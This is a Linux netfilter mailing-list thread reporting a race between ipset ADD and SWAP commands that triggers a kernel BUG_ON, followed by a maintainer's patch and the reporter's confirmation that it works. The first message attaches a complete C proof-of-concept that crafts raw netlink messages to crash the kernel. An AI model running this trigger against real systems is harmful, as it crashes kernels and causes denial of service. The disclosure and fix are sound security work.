* Race between IPSET_CMD_CREATE and IPSET_CMD_SWAP
@ 2023-09-04 23:38 Kyle Zeng
2023-09-05 6:45 ` Jozsef Kadlecsik
0 siblings, 1 reply; 3+ messages in thread
From: Kyle Zeng @ 2023-09-04 23:38 UTC (permalink / raw)
To: netfilter-devel, davem, pablo, kadlec, edumazet
[-- Attachment #1: Type: text/plain, Size: 1263 bytes --]
Hi,
There is a race between IPSET_CMD_ADD and IPSET_CMD_SWAP in netfilter/ip_set, which can lead to the invocation of `__ip_set_put` on a wrong `set`, triggering the `BUG_ON(set->ref == 0);` check in it.
More specifically, in `ip_set_swap`, it will hold the `ip_set_ref_lock`
and then do the following to swap the sets:
~~~
strncpy(from_name, from->name, IPSET_MAXNAMELEN);
strncpy(from->name, to->name, IPSET_MAXNAMELEN);
strncpy(to->name, from_name, IPSET_MAXNAMELEN);
swap(from->ref, to->ref);
~~~
But in the retry loop in `call_ad`:
~~~
if (retried) {
__ip_set_get(set);
nfnl_unlock(NFNL_SUBSYS_IPSET);
cond_resched();
nfnl_lock(NFNL_SUBSYS_IPSET);
__ip_set_put(set);
}
~~~
No lock is hold, when it does the `cond_resched()`.
As a result, `ip_set_ref_lock` (in thread 2) can swap the set with another when thread
1 is doing the `cond_resched()`. When it wakes up, the `set` variable
alreays means another `set`, calling `__ip_set_put` on it will decrease
the refcount on the wrong `set`, triggering the `BUG_ON` call.
I'm not sure what is the proper way to fix this issue so I'm asking for
help.
A proof-of-concept code that can trigger the bug is attached.
The bug is confirmed on v5.10, v6.1, v6.5.rc7 and upstream.
Best,
Kyle
[-- Attachment #2: poc.c --]
[-- Type: text/x-csrc, Size: 4655 bytes --]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>
#include <assert.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/netfilter/nfnetlink.h>
#include <stdint.h>
int nl_sock;
void *build_pkt(struct nlmsghdr *hdr, struct nfgenmsg *nfgenmsg, void *attrs, int attr_len)
{
void *payload = calloc(1, 0x1000);
void *ptr = payload;
hdr->nlmsg_len = sizeof(struct nlmsghdr) + sizeof(struct nfgenmsg) + attr_len;
//printf("%#x %#x %#x\n", sizeof(struct nlmsghdr), sizeof(struct nfgenmsg), attr_len);
//printf("nlmsg_len: %#x\n", hdr->nlmsg_len);
//printf("attr_len: %#x\n", attr_len);
memcpy(ptr, hdr, sizeof(struct nlmsghdr));
ptr += sizeof(struct nlmsghdr);
memcpy(ptr, nfgenmsg, sizeof(struct nfgenmsg));
ptr += sizeof(struct nfgenmsg);
memcpy(ptr, attrs, attr_len);
return payload;
}
void func1()
{
struct nlmsghdr nlmsghdr = {
.nlmsg_len = 0,
.nlmsg_type = 0x609, // IPSET_CMD_ADD(9) | subsys_id = NFNL_SUBSYS_IPSET(6)
.nlmsg_flags = 1, // NLM_F_REQUEST(1)
.nlmsg_seq = 0, // NL_AUTO_SEQ
.nlmsg_pid = 0 // NL_AUTO_PID
};
struct nfgenmsg nfgenmsg = {
.nfgen_family = 0,
.version = 0,
.res_id = 0
};
char attrs[] = "\x05\x00""\x01\x00""\x07\x00\x00\x00" // IPSET_ATTR_PROTOCO, protocol is hardcoded to 7
"\x09\x00""\x02\x00""set2\x00\x00\x00\x00" // IPSET_ATTR_SETNAME
"\x54\x00""\x07\x80" // IPSET_ATTR_DATA
"\x06\x00""\x04\x40""\x00\x00\x00\x00" // IPSET_ATTR_PORT_FROM
"\x06\x00""\x05\x40""\x4e\x00\x00\x00" // IPSET_ATTR_PORT_TO
"\x05\x00""\x07\x00""\x11\x00\x00\x00" // IPSET_ATTR_PROTO => IPPROTO_UDP, just a protocol that has ports (ip_set_proto_with_ports)
"\x08\x00""\x08\x40""\x00\x00\x00\x00"
"\x18\x00""\x14\x80"
"\x14\x00""\x02\x40""\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa"
"\x18\x00""\x01\x80"
"\x14\x00""\x02\x40""\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\xff\xff\x7f\x00\x00\x01";
void *payload = build_pkt(&nlmsghdr, &nfgenmsg, attrs, sizeof(attrs)-1);
send(nl_sock, payload, nlmsghdr.nlmsg_len, 0);
}
void func2()
{
struct nlmsghdr nlmsghdr = {
.nlmsg_len = 0,
.nlmsg_type = 0x606, // IPSET_CMD_SWAP(6) | subsys_id = NFNL_SUBSYS_IPSET(6)
.nlmsg_flags = 1, // NLM_F_REQUEST(1)
.nlmsg_seq = 0, // NL_AUTO_SEQ
.nlmsg_pid = 0 // NL_AUTO_PID
};
struct nfgenmsg nfgenmsg = {
.nfgen_family = 0,
.version = 0,
.res_id = 0
};
char attrs[] = "\x09\x00""\x03\x00""set1\x00\x00\x00\x00"
"\x05\x00""\x01\x00""\x07\x00\x00\x00" // IPSET_ATTR_PROTOCO, protocol is hardcoded to 7
"\x09\x00""\x02\x00""set2\x00\x00\x00\x00";
void *payload = build_pkt(&nlmsghdr, &nfgenmsg, attrs, sizeof(attrs)-1);
send(nl_sock, payload, nlmsghdr.nlmsg_len, 0);
}
void context_setup()
{
nl_sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);
struct nlmsghdr nlmsghdr1 = {
.nlmsg_len = 0,
.nlmsg_type = 0x602, // IPSET_CMD_CREATE(2) | subsys_id = NFNL_SUBSYS_IPSET(6)
.nlmsg_flags = 0x1, // NLM_F_REQUEST(1)
.nlmsg_seq = 0, // NL_AUTO_SEQ
.nlmsg_pid = 0 // NL_AUTO_PID
};
struct nfgenmsg nfgenmsg1 = {
.nfgen_family = 0,
.version = 0,
.res_id = 0
};
char attrs1[] = "\x09\x00""\x02\x00""set2\x00\x00\x00\x00"
"\x05\x00""\x04\x00""\x00\x00\x00\x00" // IPSET_ATTR_REVISION
"\x15\x00""\x03\x00""hash:ip,port,net\x00\x00\x00\x00"
"\x05\x00""\x05\x00""\x0a\x00\x00\x00" // IPSET_ATTR_FAMILY => NFPROTO_IPV6(0xa)
"\x05\x00""\x01\x00""\x07\x00\x00\x00";
void *payload1 = build_pkt(&nlmsghdr1, &nfgenmsg1, attrs1, sizeof(attrs1)-1);
send(nl_sock, payload1, nlmsghdr1.nlmsg_len, 0);
struct nlmsghdr nlmsghdr2 = {
.nlmsg_len = 0,
.nlmsg_type = 0x602, // IPSET_CMD_CREATE(2) | subsys_id = NFNL_SUBSYS_IPSET(6)
.nlmsg_flags = 0x1, // NLM_F_REQUEST(1)
.nlmsg_seq = 0, // NL_AUTO_SEQ
.nlmsg_pid = 0 // NL_AUTO_PID
};
struct nfgenmsg nfgenmsg2 = {
.nfgen_family = 0,
.version = 0,
.res_id = 0
};
char attrs2[] = "\x05\x00""\x05\x00""\x0a\x00\x00\x00" // IPSET_ATTR_FAMILY => NFPROTO_IPV6(0xa)
"\x09\x00""\x02\x00""set1\x00\x00\x00\x00"
"\x15\x00""\x03\x00""hash:ip,port,net\x00\x00\x00\x00"
"\x05\x00""\x04\x00""\x00\x00\x00\x00" // IPSET_ATTR_REVISION
"\x05\x00""\x01\x00""\x07\x00\x00\x00";
void *payload2 = build_pkt(&nlmsghdr2, &nfgenmsg2, attrs2, sizeof(attrs2)-1);
send(nl_sock, payload2, nlmsghdr2.nlmsg_len, 0);
}
int main(void)
{
context_setup();
if(!fork()) func1();
if(!fork()) func2();
getchar();
return 0;
}
^ permalink raw reply [flat|nested] 3+ messages in thread
* Re: Race between IPSET_CMD_CREATE and IPSET_CMD_SWAP
2023-09-04 23:38 Race between IPSET_CMD_CREATE and IPSET_CMD_SWAP Kyle Zeng
@ 2023-09-05 6:45 ` Jozsef Kadlecsik
2023-09-12 4:40 ` Kyle Zeng
0 siblings, 1 reply; 3+ messages in thread
From: Jozsef Kadlecsik @ 2023-09-05 6:45 UTC (permalink / raw)
To: Kyle Zeng; +Cc: netfilter-devel, davem, pablo, edumazet
Hi Kyle,
On Mon, 4 Sep 2023, Kyle Zeng wrote:
> There is a race between IPSET_CMD_ADD and IPSET_CMD_SWAP in
> netfilter/ip_set, which can lead to the invocation of `__ip_set_put` on
> a wrong `set`, triggering the `BUG_ON(set->ref == 0);` check in it.
>
> More specifically, in `ip_set_swap`, it will hold the `ip_set_ref_lock`
> and then do the following to swap the sets:
> ~~~
> strncpy(from_name, from->name, IPSET_MAXNAMELEN);
> strncpy(from->name, to->name, IPSET_MAXNAMELEN);
> strncpy(to->name, from_name, IPSET_MAXNAMELEN);
>
> swap(from->ref, to->ref);
> ~~~
> But in the retry loop in `call_ad`:
> ~~~
> if (retried) {
> __ip_set_get(set);
> nfnl_unlock(NFNL_SUBSYS_IPSET);
> cond_resched();
> nfnl_lock(NFNL_SUBSYS_IPSET);
> __ip_set_put(set);
> }
> ~~~
> No lock is hold, when it does the `cond_resched()`.
> As a result, `ip_set_ref_lock` (in thread 2) can swap the set with another when thread
> 1 is doing the `cond_resched()`. When it wakes up, the `set` variable
> alreays means another `set`, calling `__ip_set_put` on it will decrease
> the refcount on the wrong `set`, triggering the `BUG_ON` call.
>
> I'm not sure what is the proper way to fix this issue so I'm asking for
> help.
>
> A proof-of-concept code that can trigger the bug is attached.
>
> The bug is confirmed on v5.10, v6.1, v6.5.rc7 and upstream.
Thanks for the thorough report. I think the proper fix is to change the
reference counter at rescheduling from "ref" to "ref_netlink", which
protects long taking procedures (originally just dumping). Could you
verify that the patch below fixes the issue?
diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
index e564b5174261..8a9cea8ed5ed 100644
--- a/net/netfilter/ipset/ip_set_core.c
+++ b/net/netfilter/ipset/ip_set_core.c
@@ -682,6 +682,15 @@ __ip_set_put(struct ip_set *set)
/* set->ref can be swapped out by ip_set_swap, netlink events (like dump) need
* a separate reference counter
*/
+static void
+__ip_set_get_netlink(struct ip_set *set)
+{
+ write_lock_bh(&ip_set_ref_lock);
+ set->ref_netlink++;
+ write_unlock_bh(&ip_set_ref_lock);
+}
+
+
static void
__ip_set_put_netlink(struct ip_set *set)
{
@@ -1693,11 +1702,11 @@ call_ad(struct net *net, struct sock *ctnl, struct sk_buff *skb,
do {
if (retried) {
- __ip_set_get(set);
+ __ip_set_get_netlink(set);
nfnl_unlock(NFNL_SUBSYS_IPSET);
cond_resched();
nfnl_lock(NFNL_SUBSYS_IPSET);
- __ip_set_put(set);
+ __ip_set_put_netlink(set);
}
ip_set_lock(set);
Best regards,
Jozsef
-
E-mail : kadlec@blackhole.kfki.hu, kadlecsik.jozsef@wigner.hu
PGP key : https://wigner.hu/~kadlec/pgp_public_key.txt
Address : Wigner Research Centre for Physics
H-1525 Budapest 114, POB. 49, Hungary
^ permalink raw reply related [flat|nested] 3+ messages in thread
* Re: Race between IPSET_CMD_CREATE and IPSET_CMD_SWAP
2023-09-05 6:45 ` Jozsef Kadlecsik
@ 2023-09-12 4:40 ` Kyle Zeng
0 siblings, 0 replies; 3+ messages in thread
From: Kyle Zeng @ 2023-09-12 4:40 UTC (permalink / raw)
To: Jozsef Kadlecsik; +Cc: netfilter-devel, davem, pablo, edumazet
Hi Jozsef,
On Mon, Sep 4, 2023 at 11:45 PM Jozsef Kadlecsik <kadlec@netfilter.org> wrote:
>
> Hi Kyle,
>
> On Mon, 4 Sep 2023, Kyle Zeng wrote:
>
> > There is a race between IPSET_CMD_ADD and IPSET_CMD_SWAP in
> > netfilter/ip_set, which can lead to the invocation of `__ip_set_put` on
> > a wrong `set`, triggering the `BUG_ON(set->ref == 0);` check in it.
> > ......
> > A proof-of-concept code that can trigger the bug is attached.
> >
> > The bug is confirmed on v5.10, v6.1, v6.5.rc7 and upstream.
>
> Thanks for the thorough report. I think the proper fix is to change the
> reference counter at rescheduling from "ref" to "ref_netlink", which
> protects long taking procedures (originally just dumping). Could you
> verify that the patch below fixes the issue?
>
> diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
> index e564b5174261..8a9cea8ed5ed 100644
> --- a/net/netfilter/ipset/ip_set_core.c
> +++ b/net/netfilter/ipset/ip_set_core.c
> @@ -682,6 +682,15 @@ __ip_set_put(struct ip_set *set)
> /* set->ref can be swapped out by ip_set_swap, netlink events (like dump) need
> * a separate reference counter
> */
> +static void
> +__ip_set_get_netlink(struct ip_set *set)
> +{
> + write_lock_bh(&ip_set_ref_lock);
> + set->ref_netlink++;
> + write_unlock_bh(&ip_set_ref_lock);
> +}
> +
> +
> static void
> __ip_set_put_netlink(struct ip_set *set)
> {
> @@ -1693,11 +1702,11 @@ call_ad(struct net *net, struct sock *ctnl, struct sk_buff *skb,
>
> do {
> if (retried) {
> - __ip_set_get(set);
> + __ip_set_get_netlink(set);
> nfnl_unlock(NFNL_SUBSYS_IPSET);
> cond_resched();
> nfnl_lock(NFNL_SUBSYS_IPSET);
> - __ip_set_put(set);
> + __ip_set_put_netlink(set);
> }
>
> ip_set_lock(set);
>
Sorry for the late reply, somehow the response was moved to spam folder and I
didn't notice it.
> Thanks for the thorough report. I think the proper fix is to change the
> reference counter at rescheduling from "ref" to "ref_netlink", which
> protects long taking procedures (originally just dumping). Could you
> verify that the patch below fixes the issue?
I applied the patch to the upstream kernel and tested it. The proof-of-concept
crash program can no longer trigger the crash.
Best,
Kyle Zeng
^ permalink raw reply [flat|nested] 3+ messages in thread
end of thread, other threads:[~2023-09-12 4:41 UTC | newest]
Thread overview: 3+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2023-09-04 23:38 Race between IPSET_CMD_CREATE and IPSET_CMD_SWAP Kyle Zeng
2023-09-05 6:45 ` Jozsef Kadlecsik
2023-09-12 4:40 ` Kyle Zeng
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).